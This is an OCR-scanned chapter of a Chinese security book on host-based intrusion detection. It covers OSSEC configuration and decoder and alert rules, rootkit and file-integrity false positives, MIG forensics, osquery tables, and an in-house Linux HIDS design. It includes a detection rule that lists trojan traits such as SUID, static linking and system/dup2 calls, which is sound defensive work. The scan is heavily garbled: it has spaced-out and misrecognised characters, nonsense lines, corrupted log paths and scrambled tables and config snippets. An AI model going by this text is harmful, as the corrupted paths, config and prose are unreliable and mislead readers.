Windows, Linux. OSSEC Agent 在 部 署 的 时 候 会 生成 一 个 keys， 用 于 与 
服务 器 的 通信 协议 认证 。 所 有 操作 系统 的 OSSEC Agent 均 以 后 台 服 务 模 
式 被 安装 。Agent 端 默认 会 采集 某 些 系统 数据 ， 比 如 Linux 系 统 

的 /Var/log/message、/var/log/authlog、/Var/www/logs/access_log 等 常见 的 
入 侵 过 程 可 能 遗留 下 痕迹 的 地 方 。 在 Windows 上 则 会 采集 系统 上 默认 会 
存在 的 application、security、system 三 类 日 志 。 在 木马 检测 方面 ， 
OSSEC AGENTS 会 根据 配置 项 检测 一 些 和 常见 木马 和 文件 异常 行为 。 





配置 管理 一 -0OSSEC 的 检测 能 力 均 来 自 数据 采集 与 分 机 ， 而 有 具体 
有 什么 能 力 则 是 通过 配置 来 实现 。 分 为 : 前 端 数据 采集 配置 ossec- 
agent.conf; 后 端 数据 解析 配置 decoder.xml; 数据 分 析 规 则 配置 
rule/apache_rules.xml、rule/syslog_rules.xml 等 。 自 身 系 统 的 管理 也 是 可 
配置 的 ossec.conf、ossec-server.conf， 规 则 集 管理 和 告警 邮箱 、 扫 描 频 
率 、 木 马 特征 库 配 置 等 。OSSEC 配 置 管理 如 图 8-3 所 示 。 
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图 8-3 ”OSSEC 配 置 管 理 


前 面 介 绍 了 OSSEC 主 要 是 通过 配置 文件 来 决定 收集 哪些 信息 ， 主 要 
分 为 三 类 : 系统 自身 产生 的 日 志 、 任 何 用 户 配置 的 文本 日 志 、 通 
OSSEC 目 带 功 能 生成 的 数据 日 志 。 其 检测 能 力 如 下 : 


1) 规则 配置 一 一 配置 文件 以 XML 格式 书写 ， 一 个 典型 的 配置 如 下 
所 示 ， 这 表示 可 采集 本 地 的 message 和 secure 日 志文 件 内 容 : 





<localfile> 
<log_format>syslog</log_format> 
<location>/var/log/messages</location> 
</localfile> 
<localfile> 
<log_format>syslog</log_format> 
<location>/var/log/secure</location> 


</localfile> 





任何 数据 被 收集 到 服务 端 之 后 ， 还 需要 通过 decoder 解 码 格 式 化 为 服 
务 端 分 析 所 需 格 式 ， 由 配置 文件 decoder.xml 定 义 解 码 规则 。 一 个 典型 的 
解码 规则 如 下 所 示 : 





<decoder name="sshd-success"> 
<parent>sshd</parent> 
<prematch>^Accepted</prematch> 
<regex offset="after_prematch">^ \S+ for (\S+) from (\S+) port </regex> 
<order>user, srcip</order> 
<fts>name, user, location</fts> 
</decoder> 


以 上 规则 可 以 理解 为 “一 个 SSH 登 录 成 功 记 录 ”， 并 且 会 输出 几 个 天 
键 字 段 : 用 户 、 来 源 IP。 


为 了 其 数据 分 析 的 效率 考虑 ， 它 做 了 很 多 优化 的 细节 : 





事件 集 归 类 ， 如 上 述 示例 会 将 匹配 到 的 事件 归 类 到 SSHD 事 件 集 ， 
方便 后 端的 事件 分 析 。 





:分 级 匹配 ，prematch 预 匹配 一 个 粗 粒 度 的 正则 表达 式 ， 避 免 不 必 要 
的 全 量 原始 数据 直接 进入 复杂 正则 表达 式 ， 减 轻 数据 格式 化 引 苟 负担。 


:众所周知 ，PCRE 几 乎 是 最 强大 的 正则 引擎 ， 但 因为 它 的 强大 也 拖 
累 了 使 用 效率 。OSSEC 的 正则 表达 式 解 析 不 使 用 PCRE 正 则 引擎 ， 而 是 
目 己 实现 了 一 个 简化 版 的 正则 引擎 称 之 为 “os_regex Library”. 


2) 默认 能 力 \ 规 则 一 一 当 部 效 完毕 OSSEC 月 动 之 后 ， 安 装 包 中 目 带 
的 规则 集束 让 你 具备 了 初步 的 安全 事件 检测 能 力 ， 包 括 但 不 限于 以 下 内 


pp 


合 : 





:SSH 破 解 相关 规则 。 

-webserver (Apache\Nginx) 日 志 检 测 规则 。 

.杀毒 软件 (Symantec\calm) 事件 告警 规则 。 

.安全 设备 (IDS\FIREWALL\SonicWall) 事件 告警 规则 。 
‘DB (MySQL\postgresql) 事件 告警 规则 。 

-Ftpserver (proftpd\pure-ftpd\ms-ftpd) 事件 告警 规则 。 
-其 他 第 见 应 用 服务 事件 告警 规则 。 


3) 误 报 一 一 作为 一 个 开源 软件 ， 能 够 做 到 对 一 个 中 型 生产 网 络 的 
常见 入 侵 事 件 的 检测 能 力 ， 确 实 难能可贵 。 但 因 其 开源 软件 的 属性 ， 其 
功能 基本 上 是 满足 基准 需求 ， 可 用 够 用 束 好 ， 在 实际 运营 中 会 有 很 多 的 
误 报 出 现 。 为 了 对 其 误 报 场景 有 足够 的 理解 ， 不 会 被 其 干扰 ， 甚 至 可 以 
按 需 调 优 。 以 下 举例 说 明 一 些 误 报 场景 。 











:Rootkit 检 测 误 报 一 一 OSSEC 的 rootkit 检 测 方式 非常 ‘ 土 '， 但 有 效 。 
其 中 “隐藏 端口 * 检 测 人 逻辑 是 主动 尝试 去 连接 本 地 的 1-65535 端 口 ， 然 后 





与 netstat 命 令 结果 对 比 。 整 个 逻辑 清晰 ， 代 码 也 简洁 ， 作 为 一 个 普通 主 
机 的 安全 检测 是 完全 有 效 的 。 可 是 在 一 个 负载 很 高 业务 进程 索 忙 的 
Server 上 很 可 能 产生 误 报 ， 因 为 每 次 的 1-65535 循 环 过 程 中 ， 每 个 端口 的 
检测 逻辑 按 OSSEC 代 人 码 来 看 就 需要 人 花 4 秒 ， 加 之 netstat 命 令 在 高 负载 机 
器 上 也 执行 非常 慢 ， 在 netstat 还 未 执行 完毕 的 时 候 ， 原 先 能 connect 的 站 
口 早 已 关闭 ， 会 导致 误 报 “Kernel-level rootkit or trojaned”rootkit 隐 藏 端 








Oo 


文件 算 改 检测 误 报 一 一 安全 系统 对 于 系统 关键 文件 必须 是 要 有 上 监 
控 的 ， 常 见 的 做 法 就 是 做 MD5 对 比 ，OSSEC 也 有 相应 功能 。 有 一 种 场 
景 可 能 导致 误 报 ， 当 磁盘 故障 时 ， 每 次 对 同一 个 文件 的 MD5 计 算 都 不 一 
样 ，OSSEC 检 测 到 这 类 事件 会 告警 。 所 以 磁 到 此 类 告警 可 能 移 要 排除 是 
系统 故障 的 可 能 。 

















历史 上 各 时 期 总 会 有 不 同 的 安全 事件 热点 ， 远 程 缓冲 层 洪 出 攻击 、 
弱 口 令 破解 、Web 漏 洞 攻击 等 等 ， 所 以 你 会 发 现 一 成 不 变 的 规则 是 不 能 
满足 所 有 阶段 以 及 所 有 企业 的 生产 网 风险 场景 的 。 那 么 你 需要 不 断 迭 代 
完善 检测 能 力 。 








OSSEC 拥 有 基础 的 入 侵 检 测 能 力 ， 同 时 也 可 以 看 做 是 一 个 基础 数据 
采集 和 分 析 框 架 引 擎 ， 如 果 需 要 新 增 检测 能 力 ， 通 过 增加 数据 和 分 析 规 
则 是 可 以 实现 的 。OSSEC 的 功能 扩展 如 图 8-4 所 示 。 


开发 插件 采集 数据 解析 \ 检测 规则 
修改 本 地 配置 文件 


ossec-agent.conf, 
添加 配置 项 采集 生 
成 的 日 志文 件 


修改 decoder.xml 
格式 化 采集 的 日 志 


开发 本 地 扫描 检测 
工具 并 写 入 指定 日 a 
根据 检测 规则 ， 配 


# rule/your_log.xml 


志文 件 





图 8-4 ”OSSEC 功 能 扩展 


扩展 功能 介绍 如 下 : 





1) 开发 插件 ， 生 产 数 据 一 一 为 了 对 某 类 事件 有 感知 能 力 ， 首 先 开 
发 扫描 插件 ， 璧 如 说 木马 检测 场景 中 ， 你 需要 关注 服务 器 上 新 增 了 那些 
可 执行 文件 ， 以 及 这 些 文件 的 基础 检测 数据 : ELF\PE 文 件 信 息 ; inode 
信息 ， 编译 时 间 ; owner_uid; owner_name; 符号 表 有 哪些 高 危 或 敏感 
函数 。 重 点 关注 的 信息 : 











是 否 设置 S 位 权限 “〈 每 次 局 动 可 以 拿 到 root 权 限 ) 。 





否 非 工作 时 间 (黑客 通常 不 在 工作 时 间 入 侵 〉 编译 。 


是 个 继承 了 菏 些 攻击 面 服 务 进 程 属 主 账户 《比如 
Apache\MySQL 。 





是 个 有 木马 名 用 的 函数 〈 执 行 命令 system， 重 定 问 输出 dup，DDoS 


中 多 线程 pthread_creat，Linux 环 境 常 见 网 络 服 务 多 线程 模型 用 得 较 


少 ) 。 


新 增 的 扫描 工具 添加 到 crontab 周 期 性 运行 ， 并 将 结果 写 入 日 
志 /vVa/log/Sensitive_elf， 设 定 的 日 志 格 式 在 OSSEC Server 端 规则 中 需要 
解析 。 璧 如 一 条 新 增 elf 文 件 的 扫描 信息 上 报 如 下 : 











Permission:S_ISUID| linked: static | inode: 606356 |ctime:22|owner_uid:501|owner_name:no 
body | function: system, dup2, pthread_creat 











2) PS Ar A AS A eso Za, BE eossec- 
agent.conf 文 件 ， 新 增 日 志 采 集 配置 : 





<localfile> 
<log_format> Sensitive_elf </log_format> 
<location>/va/log/Sensitive_elf </location> 
</localfile> 





3) 开发 解析 \ 检 测 规则 一 一 当 数 据 从 agent 端 采集 到 Server 端 之 后 ， 
第 一 步 是 需要 解析 格式 化 ， 这 时 需要 修改 的 束 是 decoder.xml， 通 过 对 它 


的 配置 ， 可 以 让 OSSEC 能 提取 你 日 志 里 的 关键 信息 。 





接 下 来 到 告警 规则 ， 在 OSSEC 安 装 目 录 的 etc/rule/ 目 录 下 新 增 一 个 
xml 配 置 文件 ， 比 如 Sensitive_elf.xml。 





继续 按 前 述 < 新 增 可 疑 ELE 文 件 " 场 景 举例 ， 新 增 一 个 检测 规则 措 
述 < 当 新 增 的 ELF 文 件 包含 任意 3 个 危险 特征 判断 为 高 危 文件 *， 那 么 规则 


如 下 : 





<rule id="54321" level="3"> 
<match>SUID|static |nobody | |system|dup2|pthread_creat</match> 
<description>dangerous execute binary file.</description> 
</rule> 
<rule id="543210" level="10" frequency="3"> 
<if_matched_sid>54321</if_matched_sid> 
<same_source_ip /> 
<description>dangerous execute binary file.</description> 
</rule> 





8.1.2 MIG 


Mozilla InvestiGator 是 一 个 开源 的 分 布 式 取证 框架 ， 不 能 算是 严格 
意义 上 的 HIDS， 但 功能 与 HDS 类 似 ， 它 主要 作用 是 通过 消息 队列 
Active MQ 在 分 布 式 的 agent 上 执行 系统 检查 命令 然后 返回 结果 ， 目 前 包 
含 4 个 模块 ， 分 别 是 : 文件 Cile) 、 网 络 (network) 、 内 存 

(memory) ~ Jil] Cvuln) ， 如 表 8-1 所 示 。 


前 


表 8-1 MIG 对 各 平台 支持 的 功能 
































功能 Linux Macos windows 
文件 检测 Vv Vv y 
网 络 检测 V V (计划 中 ) 
内 存 检测 V vV WY 
漏洞 管理 vV (计划 中 ) (计划 中 ) 
系统 审计 (计划 中 ) (计划 中 ) (计划 中 ) 








MIG 系 统 架构 如 图 8-5 所 示 。 
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图 8-5 MIG 系统 架构 图 


从 这 张 图 可 以 看 出 MIG 有 具备 了 现代 HIDS 架 构 的 骏 形 ， 但 是 整体 上 
MIG 偏 向 于 事后 的 取证 ， 而 不 是 实时 的 入 侵 检测 ， 所 以 只 部 署 MIG 还 不 
能 实现 主机 侧 的 入 侵 检测 ， 必 须 辅 之 以 其 他 的 Agent， 如 OSSEC 或 


Osquery 等 。 


下 面 是 一 些 比较 直观 的 MIG 适 合 干什么 的 列子 : 


[ulfr@fedbox2 ~]$ mig netstat -e 20s -ci 62.210.76.92 


ssh1.corpdmz.scl3.mozilla.com found connected tuple 62.210.76.92:45432 with local tuple 10.22 
.72.158:22 for netstat connectedip: '62.210.76.92’ 


[ulfrefedbox2 ~]$ Jj 





如 条 你 知道 一 个 攻击 特征 ，MIG 能 够 迅速 帮 你 得 找 哪些 服务 器 上 拥 
有 这 些 特 征 : 


，Size:142744] in search “Ss1 
ig-admin-prod1.usel .moz-opsec.mozilla.com /var/log/secure [lastmodified:2015-04-21 14:23:04. 
127260834 +0000 UTC, mode:-rw , $1ze:2671887] in search 's1' 
ppsecl.private.phx1.mozilla.com /var/log/secure [lastmodified: 2015-04-21 14:15:23.751627611 + 
2000 UTC, mode:-rw , $ize:23430] in search 's1’ 


/var/log/secure [lastmodified: 2015-04-21 14:38:22.177328882 +0000 
, $ize:698187] in search 's1’ 


[ulfr@fedbox2 ~]$ Jj 





同样 ， 如 果 你 得 知 discuz 东 个 版 本 的 程序 有 漏洞 ， 你 可 以 通过 文件 
指纹 《SHA256 哈 希 值 或 其 他 ) 迅速 查找 匹配 的 机 器 ， 用 以 调查 哪些 地 
方 需要 修补 。 


总 体 上 对 于 救火 而 言 MIG 是 利器 。 





Facebook 的 开源 项 目 OSquery 这 个 东西 在 国内 比较 冷门 ， 它 不 能 
是 完全 的 HIDS， 也 不 能 说 是 完全 为 了 安全 而 设计 的 ， 有 一 部 分 应 该 是 
出 于 运 维 的 需求 。 它 的 实现 是 把 操作 系统 当做 一 个 数据 库 ， 各 种 系统 信 
息 可 以 用 SQL 语句 的 方式 来 查询 ， 如 下 所 示 : 








一 般 人 可 能 不 会 把 它 联 想到 是 一 个 安全 强 相 关 的 系统 ， 但 是 我 们 摘 
一 些 它 文 持 的 碍 询 项 来 看 : 


— SELECT address, mac, id.interface 
FROM interface details AS id, interface addresses AS ia WHERE id.interface = ia.interface; 


| com.apple.kec.corecrypto 
| com.apple.iokit.IOACPIFamily 
| com.apple.iokit.IOPCIFamily 


SELECT 
u.username, 
g.name as groupname, 
u.directory, 
u.description 

FROM users AS u 

JOIN groups AS g ON u.gid = 


_amavisd _amavisd | /var/virusmails | AMaViS Daemon 
_appleevents | _appleevents /var/fempty | AppleEvents Daemon 


-ea _appserverusr | /var/empty | Application Server 
_ard | /var/empty | Apple Remote Desktop 


| 

| | 

| _appowner _appowner | /var/empty | Application Owner 
| | 

Ps 


本 本 可 -和 
osquery> .exit 
[osquery] ~ exit 





socket events 


Track network socket opens and closes. 


Column 
action 
pid 
path 
fd 
success 
family 
protocol 
local_address 
remote_address 
local_port 
remote_port 
socket 
time 


uptime 


Type 


TEXT_TYPE 


BIGINT_TYPE 
TEXESEYPE 
TEXT_TYPE 
INTEGER_TYPE 
INTEGER_TYPE 


INTEGER_TYPE 


TEXT_TYPE 


TEXT_TYPE 


INTEGER_TYPE 
INTEGER_TYPE 


TEXT_TYPE 


BIGINT_TYPE 


BIGINT_TYPE 


Description 


The socket action (bind, listen, close) 
Process (or thread) ID 

Path of executed file 

The file description for the process socket 
The socket open attempt status 

The Internet protocol family ID 

The network protocol ID 

Local address associated with socket 
Remote address associated with socket 
Local network protocol port number 
Remote network protocol port number 
The local path (UNIX domain socket only) 
Time of execution in UNIX time 


Time of execution in system uptime 


file_events 


Track time/action changes to files specified in configuration data. 





process_events 


Track time/action process executions. 


Column 
pid 
path 
mode 
cmdline 
cmdline_size 
environment 
environment_count 


environment_size 


Type 





Column | Type Description 
target_path “TEXT_TYPE The path associated with the event 
| category |TExr_TYPE The category of the file defined in the config 
action | TEXT_TYPE Change action (UPDATE, REMOVE, etc) 
transaction_id | BIGINT_TYPE ID used during bulk update 
inode | BIGINT_TYPE Filesystem inode number 
uid | BIGINT_TYPE ‘Owning user ID 
gid | BIGINT_TYPE ‘Owning group ID 
mode “TEXT_TYPE Permission bits 
size i | BIGINT_TYPE [Size of file in bytes a g i 
atime | BIGINT_TYPE [Last access time 
mtime | BIGINT_TYPE Last modification time 
ctime [BIGINT_TYPE Last status change time 
| md5 [TEXT_TYPE The MDS of the file after change 
shal “TEXT_TYPE The SHA1 of the file after change 
sha256 1TExT TYPE |The SHA256 of the file after change 
hashed |INTEGER_TYPE | 1 if the file was hashed, 0 if not, -1 if hashing failed 
‘time BIGINT_TYPE Time of file event = E 


Description 


BIGINT_TYPE 
TEXT_TYPE 
BIGINT_TYPE 
TEAL TYPE 
BIGINT_TYPE 
TEXT_TYPE 
BIGINT_TYPE 


BIGINT_TYPE 


Process (or thread) ID 

Path of executed file 

File mode permissions 

Command line arguments (argv) 

Actual size (bytes) of command line arguments 
Environment variables delimited by spaces 
Number of environment variables 


Actual size (bytes) of environment list 


Column Type Description 


uid BIGINT_TYPE User ID at process start 

euid BIGINT_TYPE Effective user |D at process start 
gid BIGINT_TYPE Group ID at process start 

egid BIGINT_TYPE Effective group ID at process start 
owner_uid BIGINT_TYPE File owner user ID 

owner_gid BIGINT_TYPE File owner group ID 

create_time BIGINT_TYPE File creation in UNIX time 

access time BIGINT_TYPE File last access in UNIX time 
modify_time BIGINT_TYPE File modification in UNIX time 
change time BIGINT_TYPE File last metadata change in UNIX time 
overflows TEXT_TYPE List of structures that overflowed 
parent BIGINT_TYPE Process parent's PID 

time BIGINT_TYPE Time of execution in UNIX time 
uptime BIGINT_TYPE Time of execution in system uptime 


跟 安 全 相关 的 项 目 不 止 这 些 ， 因 篇 幅 关 系 不 过 多 列举 ， 这 些 碍 询 项 
乍 一 看 都 很 不 起 眼 ， 不 是 直接 可 以 检测 安全 的 选项 ， 大 多 数 都 不 足以 判 
断 有 无 攻击 或 者 是 否 被 装 了 rootkit， 但 是 如 果 周 期 性 地 轮 询 这 些 信息 ， 
通过 消息 队列 将 关键 信息 发 送 到 云端 进行 如 文件 的 完整 性 对 比 、 进 程 树 
模型 对 比 ， 就 能 检测 是 否 正在 遭受 入 侵 、 被 提 权 、 被 攻击 者 创建 新 的 进 
程 等 。 能 否 实现 实时 入 侵 检 测 的 关键 在 于 你 采集 数据 的 维度 和 云端 的 检 
测 方法 。 大 多 数 人 的 思路 可 能 还 停留 在 Agent 直 接 告 警 的 年 代 ， 这 可 能 
也 是 导致 O0Squery 冷 门 的 一 个 原因 。 











作为 一 个 2014 年 开源 的 项 目 ， 它 也 有 一 些 不 足 之 处 ， 比 如 支持 的 版 


本 有 限 ， 目 前 只 支持 Apple OS X Mavericks & Yosemite, Linux CentOS 
6.6/7.0 和 Ubuntu LTS (12.04/14.04) ， 其 他 版 本 需要 安全 团队 中 有 开发 
人 员 做 兼容 性 适 配 。 


如 果 要 正式 在 服务 器 上 使 用 OSquery， 它 还 不 是 一 个 成 品 ， 因 为 本 
身 只 是 一 个 Agent 程 序 ， 不 是 一 个 完整 的 HIDS， 从 日 志 聚 合 开始 到 云端 
分 析 的 大 数据 平台 以 及 管理 端 都 需要 自己 去 实现 ， 只 有 实现 了 这 些 才 算 
是 一 整套 的 平台 ， 光 有 平台 也 还 不 行 ， 还 要 定义 BI 的 那些 事情 ， 采 集 哪 
些 ， 分 析 什 么 ， 对 于 不 够 的 数据 采集 点 可 以 自行 开发 插件 。 











总 之 ，OSqguery 适 合 于 有 一 定 IDC 规 模 的 企业 ， 安 全 团队 有 一 定 的 
开发 能 力 ， 并 且 对 入 侵 检 测 有 基于 大 数据 理解 的 环境 。 





8.1.4” 自 研 Linux HIDS 系 统 


互联 网 公司 业务 的 急速 扩张 ， 也 让 各 大 公司 的 生产 网 环境 急速 膨 
胀 ， 以 至 于 他 们 的 生产 网 安全 对 抗 也 变 得 更 加 复杂 ， 使 得 几乎 很 难 有 一 
个 可 直接 照搬 或 者 购买 部 署 的 HIDS 产 品 能 满足 需求 ， 主 要 原因 如 下 : 


海量 环境 需求 & 迭代 
号 商业 产品 价格 昂 贯 ， 不 宜 海量 部 兰 口 业界 产品 不 适应 互联 网 企业 业务 变化 
市 来 的 安全 风险 快速 变化 


口 业 界 常见 产品 数据 处 理性 能 不 能 满足 需求 。 口 外 部 产品 无 法 快速 变更 应 对 新 漏洞 、 
攻击 手法 
口 核心 业务 数据 需要 有 可 控 管理 口 侵 入 性 较 强 的 产品 ， 不 易 采 用 外 部 产 


品 ， 外 部 厂商 无 法 快速 响应 
综 上 原因 ， 往 往 各 大 互联 网 公司 都 会 考虑 目 研 HIDS 类 系统 ， 并 且 


这 类 HIDS 也 未 必 是 市 面 上 的 通用 HIDS 模 式 ， 会 根据 企业 自身 的 安全 风 
险 以 及 生产 网 架构 适当 调整 风格 ， 架 构 也 有 各 自 的 独到 上 自 处 。 





1. 架 构 设 计 


里 然 HIDS 在 一 个 企业 的 安全 体系 中 几乎 成 了 一 个 基础 设施 般 的 存 
在 ， 但 在 架构 设计 之 初 ， 第 一 步 是 还 是 需要 梳理 清楚 自己 的 安全 需求 ， 


以 及 怎样 适合 企业 上 自身 运 维 体系 ， 才 能 有 更 适合 目 身 的 架构 。 














行业 法 规 需求 一 行业 法 规 这 里 指 上 市 公司 审计 要 求 ， 等 级 保护 
等 。 通 常 要 求 要 求 对 系统 账户 登录 有 记录 ， 有 追溯 审计 能 




















.基础 安全 需求 一 一 基础 安全 需求 来 自 于 常见 入 侵 场 景 检 测 能 力 要 
求 ， 一 般 逐 一 对 应 渗透 入 侵 的 各 个 环节 的 检测 能 力 。 如 : 端口 扫 摘 、 
SQLIEA. fit YEA. webshell, KERH, RIR, FEM. MHA 


P 
等 。 


企业 自身 的 特殊 安全 风险 需求 一 一 根据 分 析 历 史 安 全 事件 复 盘 和 
基线 安全 数据 ， 推 导出 的 企业 上 自身 存在 的 特定 安全 特点 和 场景 ， 为 解决 


此 类 场景 专 设 的 能 





运 维 体系 \ 网 络 环 境 适 应 一 一 根据 前 述 的 风险 需求 分 析 选 择 更 适合 
自身 的 架构 ， 比 如 风险 主要 来 自 wWeb 攻 击 ， 那 么 HIDS 未 必需 要 做 内 核 
模块 功能 ， 但 如 条 是 云 租 户 环 境 则 不 同 ， 因 为 云 租户 受到 的 攻击 各 种 各 
样 ， 往 往 很 容易 就 被 攻击 拿 到 root 权 限 ， 甚 至 会 有 更 多 的 横向 渗透 过 
程 ， 那 么 在 内 核 态 是 有 必要 有 安全 措施 的 。 














HIDS 基 本 是 CS 架构 ， 与 传统 安全 软件 不 同 的 是 ， 现 在 互联 网 公司 
的 生产 网 环境 对 系统 性 能 极为 敏感 ， 通 常 对 安全 系统 提出 较为 苛刻 的 系 
统 资源 消耗 指标 要 求 ， 加 之 为 快速 应 对 新 型 风险 的 检测 能 力 ， 使 得 主要 
的 计算 分 析 基 本 迁移 到 后 端 进行 ， 前 端 仅仅 以 数据 采集 为 主 。HIDS 系 
统 架构 如 图 8-6 所 示 。 





Server 


E S gents 1 






Linux Agent 


Windows Agent 


J 管理 控制 台 
图 8-6 HIDS 系 统 架 构 


在 超大 型 网 络 里 ， 为 考虑 容 灾 ， 以 及 海量 服务 顺和 海量 数据 的 性 能 
压力 ， 整 套 HIDS 系 统 还 会 拆 分 成 多 个 层级 。 第 一 级 可 投机 房 或 订 地 区 
数据 中 心 划 分 ， 每 个 部 署 单元 设立 两 个 以 上 接 入 Server 作 为 容 灾 备份 。 
在 运营 过 程 中 ， 我 们 会 发 现 大 量 垃圾 数据 、 脏 数据 ， 考 虑 到 路 区 域 传输 
对 带宽 的 影响 以 及 减少 后 端 无 意义 计算 ， 可 以 将 第 一 级 数据 分 析 &g 格 式 
化 中 心 束 近 部 署 ， 仅 将 过 小 之 后 的 高 价值 数据 问 后 面 数据 计算 存储 集群 
传输 。 





2.Agent 功 能 模块 


Agent 分 三 个 部 分 ， 安 全 功能 模块 、 数 据 传 输 、 管 理 模块 。HIDS 
Agent 架 构 如 图 8-7 所 示 。 





Agent 





图 8-7 HIDS Agent 架 构 


安全 功能 模块 是 整个 Agent 的 核心 部 分 。 各 个 功能 模块 既 可 以 以 单 
独 进 程 也 可 以 以 线程 模式 存在 ， 建 议 用 独立 进程 模型 ， 因 为 避免 因 单 个 
BUG 影响 整个 Agent 系 统 的 稳定 性 。 这 里 的 各 个 子 模块 的 功能 是 对 应 于 
不 同安 全 需求 的 ， 每 个 公司 根据 目 身 风险 推导 出 的 需求 不 一 定 相 同 ， 这 
EJA E LER 








1) 基线 安全 一 一 基线 数据 可 以 说 是 一 个 古老 但 不 能 舍弃 的 标 配 ， 
采集 主机 上 配置 版 本 信息 。 主 要 针对 两 类 需求 : 安全 视角 的 软 资 产 管 
理 ，0day 应 急 。 当 新 出 现 一 个 0day， 需 要 通过 基线 数据 及 时 知晓 企业 自 
喘 网 络 环境 里 受 影 啊 的 范围 有 多 大 ， 并 能 直接 导出 iplist 等 信息 ， 并 指导 





应 急 啊 应 下 一 步行 动 。 此 模块 的 采集 方式 ， 在 Linux 系 统 下 以 读 取 解 析 
文本 配置 为 主 ， 辅 以 茶 些 二 进 制 文件 的 ELE 格 式 解 机 ，Windows 系 统 通 
过 读 取 注册 表 和 组 策略 信息 可 完成 采集 。 











可 采集 的 数据 包括 但 不 限于 以 下 信息 : 


系统 版 本 ，Linux 发 行 版 版 本 和 内 核 版 本 包括 内 核 热 补丁 等 ; 
Windows 则 包含 补丁 “微软 官方 补丁 公告 中 注册 表 项 ) 信息 ; 


.系统 账户 ，Linux 可 直接 取 passwd 文 件 或 仅 解析 提取 其 中 部 分 信 
息 ， 如 账户 名 、 权 限 、 以 及 shadow 里 的 密码 最 后 一 次 修改 时 间 ; 
Windows 取 账户 权限 、 权 限 组 、 最 后 登录 时 间 ; 


系统 关键 文件 MD5 
:应 用 服务 版 本 ， 诸 如 sshd\ftp\telnetd\RDP 版 本 信息 


第 三 方 应 用 服务 版 本 ， 


apachenginx\tomcat\IIS\mysql\sqlserver\oracle 版 本 信息 





:第 三 方 服 务 配 置 文件 ，webserver 配 置 文件 ，web 根 目录 路 径 ， 启 动 
账户 权限 ， 支 持 的 method\CGT 第 三 方 模块 信息 ;php 配置 ， 版 本 信息 ， 
安全 配置 项 开关 情况 如 


safe_mode\disable_function\magic_quotes_gpc\safe_mode_exec_dir\safe_mo 





FY 
等 ; 


-Webapp 版 本 ， 


discuz\phpwind\phpbb\wordpress\thinkphp\phpcms\dedecms\struts\xwork 


Fy 
等 。 








2) 日 志 采 集 一 一 在 较 早 的 HIDS 设 计 里 日 志 采 集 也 是 标 配 ， 甚 至 是 
最 核心 功能 。 但 事实 上 日 志 里 的 信息 量 较为 有 限 ， 大 量 新 的 攻击 手段 ， 
常规 日 志 己 不 能 饿 履 盖 其 攻击 面 和 攻击 向 量 。 采 和 集 的 日 志 内 容 如 下 : 








‘Linux 42% AS. 

:Syslog 默 认 日 志 : /var/log/message 
:系统 服务 登录 记录 : /var/log/secure 
:系统 账户 登录 记录 : /var/log/secure 
‘Windows #2 


-应 用 服务 日 志 : application 〈 不 少 第 三 方 服务 日 志 也 会 写 入 这 里 ， 


如 sqlserverSymantec\serv-U 等 ) 
安全 日 志 : security 
:系统 日 志 : system 


-Webserver 


.所 有 的 webserver 日 志 ， 包 括 apachevnginxvtomcatIIS 等 


-扩展 插件 日 志 








:这 里 指 在 AGENT 发 布 时 没有 的 功能 ， 暂 时 用 小 程序 或 脚本 应 急 产 
生 的 日 志 ， 可 通过 修改 HIDS 配 置 采 集 解 析 上 报 。 男 一 种 技巧 就 是 可 将 
临时 小 程序 的 日 志 输 出 到 系统 日 志 ，Linux 的 syslog 或 Windows 的 


application 日 志 中 。 


3) 进程 信息 一 一 相 比 前 面 几 个 ， 这 是 几乎 所 有 HIDS 都 有 的 标 配 模 
块 ， 进 程 信息 数据 在 入 侵 检测 方面 贡献 的 价值 更 大 。 在 Linux 系 统 中 ， 
几乎 所 有 的 运 维 操作 以 及 入 侵 行为 都 会 体现 到 执行 的 命令 中 。 所 以 进程 
命令 信息 无 论 是 作为 运 维 操作 审计 ， 还 是 入 侵 行为 分 析 都 有 极 大 帮助 。 








进程 信息 获取 技术 方案 选择 如 下 : 





周期 性 损 历 /proc。 这 是 风险 最 小 的 方案 ， 部 署 适 配 性 最 强 。 但 缺 
点 明显 ， 实 时 性 无 法 得 到 保障 ， 且 性 能 差 ; 


用 户 态 Hook Libc 函 数 。 相 比 前 面 一 种 方案 ， 风 险 相 对 高 一 点 ， 特 
别 在 多 线程 进程 中 要 注意 安全 性 。 但 其 部 署 适 配 性 也 特别 高 ， 同 时 性 能 
也 是 各 种 方案 最 好 的 ， 建 议 作 为 首要 选择 。 虽 然 libc hook 方 式 可 能 有 被 
绕 过 的 风险 ， 但 如 果 对 抗 主 要 集中 在 Web 入 侵 场 景 ， 基 本 是 无 需 担 心 
的 。 

















:利用 LSM 模 块 接口 。 如 果 对 抗 必 须 深 入 系统 级 攻防 ， 那 么 通过 内 
核 态 获取 进程 数据 就 非常 必要 了 。 但 是 为 了 安全 性 、 适 配 性 考虑 ， 采 用 
LSM (Linux security module) 开发 接口 就 是 较 佳 的 选择 。Fackbook 安 全 
团队 开发 的 OSquery 就 是 使 用 了 LibAudit 获 取 execve 调 用 信息 。 


内 核 态 syscall HOOK， 安 全 类 的 开发 最 惯性 的 思维 就 是 内 核 态 
HOOK， 反 倒 不 是 什么 新 鲜 的 招式 。 但 是 这 样 的 方案 未 必 都 适合 大 范围 
使 用 ， 作 为 一 个 可 能 要 大 量 部 署 的 安全 系统 来 说 ， 不 是 一 个 最 佳 选 择 。 
在 Linux 环 境 里 各 种 发 行 版 和 内 核 版 本 差异 很 大 ， 以 至 于 需要 维护 多 个 
兼容 性 版 本 ， 同 时 稳定 性 也 难以 保证 。 这 类 方案 通常 是 开发 一 个 LKM 
模块 实现 。 











如 采 仪 仅 是 记录 进程 派生 事件 ， 通 币 仅 需要 少数 几 个 字段 即 可 。 但 
是 建议 在 设计 数据 结构 〈 字 段 ) 的 时 候 ， 先 将 数据 的 使 用 场景 想 清楚 ， 
这 样 或 许 你 需要 的 字段 信息 将 会 更 多 ， 同 时 输出 的 字段 既 不 浪费 传输 布 
宽 和 存储 空间 ， 还 能 最 大 化 的 服务 于 使 用 场景 。 表 8-1 是 建议 使 用 的 字 
段 。 








表 8-1 建议 使 用 字段 





















































字段 描述 数据 类 型 
Pid 进程 ID Int 
Path 可 执行 文件 绝对 路 径 TEXT 
mode 可 执行 文件 权限 Int 
Cmdline 进程 命令 行 TEXT 
ENV 进程 执行 环境 变量 TEXT 
Uid 启动 进程 的 用 户 uid Int 
Euid 启动 进程 的 用 户 euid Int 
Gid 启动 进程 的 用 户 gid Int 
egid 启动 进程 的 用 户 egid Int 
( 续 ) 
字段 描述 数据 类 型 
sid 进程 会 话 组 ID Int 
